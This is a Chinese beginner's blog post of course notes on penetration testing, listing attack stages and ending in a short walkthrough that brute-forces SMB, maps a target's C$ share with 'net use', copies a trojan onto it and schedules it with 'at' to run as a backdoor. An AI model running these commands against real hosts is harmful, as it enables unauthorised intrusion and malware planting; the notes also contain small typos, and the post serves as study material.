引言:我的系列博客[网络安全学习篇]上线了,小编也是初次创作博客,经验不足;对千峰网络信息安全开源的视频公开课程的学习整理的笔记整理的也比较粗糙,其实看到目录有300多集的时候,讲道理,有点怂了,所以我就想到了通过写博客(课程笔记)的形式去学习它,虽然写博客会让我多花几倍的时间去学习它,但是当我完成一篇博客所获得的成就感和你们对于我的认同感,让我很满足,能够鼓励我一天天的坚持下去,也希望和我一起学习本期视频的"同道"们也能给一直坚持下去。我们大家一起加油。由于作者本身也是网络信息安全小白,大部分知识点都是初次接触,出现对其理解不深入,不完整,甚至也会出现错误有问题的地方,希望大家谅解、留言提出指正,同时也欢迎大家来找我一起交流学习!!!
往期博客:
[网络安全学习篇1]:windowsxp、windows2003、windows7、windows2008系统部署(千峰网络安全视频笔记)
[网络安全学习篇2]:IP详解及简单的DOS命令(千峰网络安全视频笔记 2 day)
[网络安全学习篇3]:批处理、病毒、用户与组管理、破解系统密码(千峰网络安全视频笔记 3 day)
[网络安全学习篇4]:NTFS安全权限、文件共享服务器(千峰网络安全视频笔记 4 day)
[网络安全学习篇5]:DHCP部署与安全、DNS部署与安全(千峰网络安全视频笔记 5 day)
[网络安全学习篇6]:WEB服务器和FTP服务器(千峰网络安全视频笔记 6 day)
[网络安全学习篇7]:域(千峰网络安全视频笔记 7 day)
[网络安全学习篇8]:PKI(千峰网络安全视频笔记 8 day)
[网络安全学习篇9]:渗透测试(千峰网络安全视频笔记 9 day)(本篇)
下期博文:
[网络安全学习篇10]:扫描技术、暴力破解工具(千峰网络安全视频笔记 10 day)
目录
渗透测试
0、授权
1、信息收集
nslookup whois
2、扫描漏洞
namp = ip范围 端口 80(IIS,apache,什么网站)
scanpot
高级扫描:如IIS漏洞2003-IIS6.0 2008-IIS7.0
扫描网站漏洞
3、漏洞利用
4、提权(shell(命令行cmd)环境、桌面环境、最高权限)
5、毁尸灭迹
6、留后门
7、渗透测试报告
手工测试端口号开放:
telnet IP 地址 测试端口
445漏洞利用之一IPC$:
1、scanport 扫描445端口
2、进行暴力破解:NTscan
3、
net use f: \\10.1.1.2\ipc$ 密码 /user:用户
=================================================
net use f: \\10.1.1.2\share 密码 /user:用户
net use * /del
net use * /del
net use f: \\10.1.1.2\c$ 密码 /user:用户
=================================================4、制作木马
5、植入木马(留后门)
copy d:\heihei.exe \\10.1.1.2\c$6、设计计划任务自动执行木马:
net time \\10.1,1.2
at \\10.1.1.2 11:11 "c:\heihei.exe"7、等待肉鸡上线
参考文献:
2023
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
